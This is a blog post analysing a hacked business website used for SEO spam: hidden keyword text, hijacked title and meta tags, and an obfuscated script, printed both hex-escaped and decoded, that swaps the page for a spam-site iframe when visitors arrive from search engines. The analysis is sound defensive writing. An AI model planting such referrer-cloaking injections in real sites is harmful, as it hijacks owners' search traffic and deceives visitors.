Security Research: Hijacking Your Domain Authority

Anyone who owns a blog knows that they’re going to get a bunch of spam posts. Frequently, these are intended as spam for SEO purposes– create a bunch of low-quality links that all say “Buy Fake Watches Filled With Erectile Dysfunction Pills”, linking back to the “money site” where you actually sell the goods. Usually, this was either a keyword stuffed domain (gobuycheapfakewatches2014now.info) or a complete nonsense domain (etroigjfrhnjlkfhjgh.info), because nobody wanted to spend money on a quality domain with real rankings to run the scam.

Lately, I noticed a new trend. Very spammy anchor text, linked to legitimate looking domains. When you loaded the pages up, they looked and felt like normal websites, with nothing to do with the original anchor text. Where’s the business plan?

The interesting thing happens beneath the surface. They’ve been compromised. While the sites themselves continue to function normally, you see a little extra content added into the middle of their code.

The site we investigated had a conventional, albeit old-fashioned table layout, with one extra table cell.

<td style="display:none">
[Three paragraphs about "outlet sales" of purses snipped, each with their own well-optimized header tag]
</td>

While the content was structured well for SEO, it’s still meaningless. Users won’t see it, and since it resides in a table cell explicitly styled “display:none”, search engines will be prone to discount it as unimportant.

It doesn’t even have any obvious link-building power, because the injected text has no outbound links.

Second, we noticed the title has been replaced. While the site it’s on is a small IT consulting company, the title and meta tags are all

<title>Michael Kors Canada Outlet Handbags Are On Hot Sale Online Now
</title>
<meta name="description" content="Michael Kors Canada online sale now up to 70% off! With fabulous sale, it's time to change your attitude. Just buy Michael Kors outlet handbags in the our store, you can win the others with our best service now, our Michael Kors outlet store can offer you Michael Kors wallet,Michael Kors watches, Michael Kors bags are waiting for you in our store, welcome to buy!" />


Okay… this goes along with the injected message. More about fake handbags. But still no clear monetization plan.

The more interesting part is happening at the bottom of the code. A second injection includes some JavaScript


var tJDfHyR1=window["x64x6fx63x75x6dx65x6ex74"]["x72x65x66x65x72x72x65x72"];if(tJDfHyR1["x69x6ex64x65x78x4fx66"]("x67x6fx6fx67x6cx65")>0 || tJDfHyR1["x69x6ex64x65x78x4fx66"]....

When this code is executed, all that x?? stuff is decoded into normal characters, yielding the following code:

window["document"]["referrer"];if(tJDfHyR1["indexOf"]("google")>0 || tJDfHyR1["indexOf"]("bing")>0 || tJDfHyR1["indexOf"]("yahoo")>0 || tJDfHyR1["indexOf"]("aol")>0|| tJDfHyR1["indexOf"]("ask")>0){window["document"]["body"]["innerHTML"]="<iframe width='100%' scrolling='no' height='3200' frameborder='0' src='http://www.SPAMMY SITE HERE.com'>";

In short, what you have here says “If the user has come off Google, Yahoo, AOL.com, Bing, or Ask Jeeves, rip out the site content and display a frame for the real “Money Site”. If you followed the link from the original spam, you’d never see it load. If you came to the site directly, or followed a third-party link, you’d never see the fake site. Only search engine traffic is affected.

Suddenly, all the changes above make perfect sense. The title tags and minor injection of relevant content will help the site rank and display properly in searches for the spammer’s chosen keyword.

They’re hijacking your domain’s age and authority to rank comparatively well for “Michael Kors Purses”. But far worse, they’ll completely sacrifice any search engine traffic you get. If you had been getting visitors for your brands, your line of business, or your regional presence, too bad. All they’re gonna see is bootleg handbags.

The good news is that it’s a pretty blatant thing– the code’s right in your HTML and can easily be checked for.

comments powered by Disqus